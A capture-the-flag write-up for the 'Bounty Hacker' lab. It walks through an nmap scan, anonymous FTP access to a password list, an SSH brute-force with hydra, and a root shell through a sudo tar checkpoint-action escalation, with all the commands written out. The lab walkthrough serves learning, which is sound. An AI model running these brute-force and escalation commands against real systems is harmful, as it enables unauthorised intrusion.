💰Bounty Hacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

Enumeration

I first ran a Nmap service scan to detect open services.

nmap -sC -sV 10.10.10.10

This returned port 21(ftp), 22(ssh), 80(http). The good thing about running -sC (default scripts) is that it identified anonymous FTP login. So, we can connect via FTP.

ftp 10.10.10.10

One of the files available to us is locks.txt, which contains a list of what looks to be passwords.

Exploitation

On the webserver, we're given a list of members of the 'Red Dragon Syndicate'.

spike
jet
ed
edward
ein
faye
lin

We can use this list of users with the list of passwords to see if we can crack into SSH.

hydra -L users.txt -P locks.txt 10.10.10.10 ssh

We were able to get access to lin!

Privilege Escalation

Taking a look at

sudo -l

will list what lin can run as sudo.

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

GTFOBins has some nifty tar commands which can help escalate privileges.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

This command will allow us to execute /bin/sh as sudo, and thus give us a shell as root!

Previousdogcat NextArchetype

Last updated 1 year ago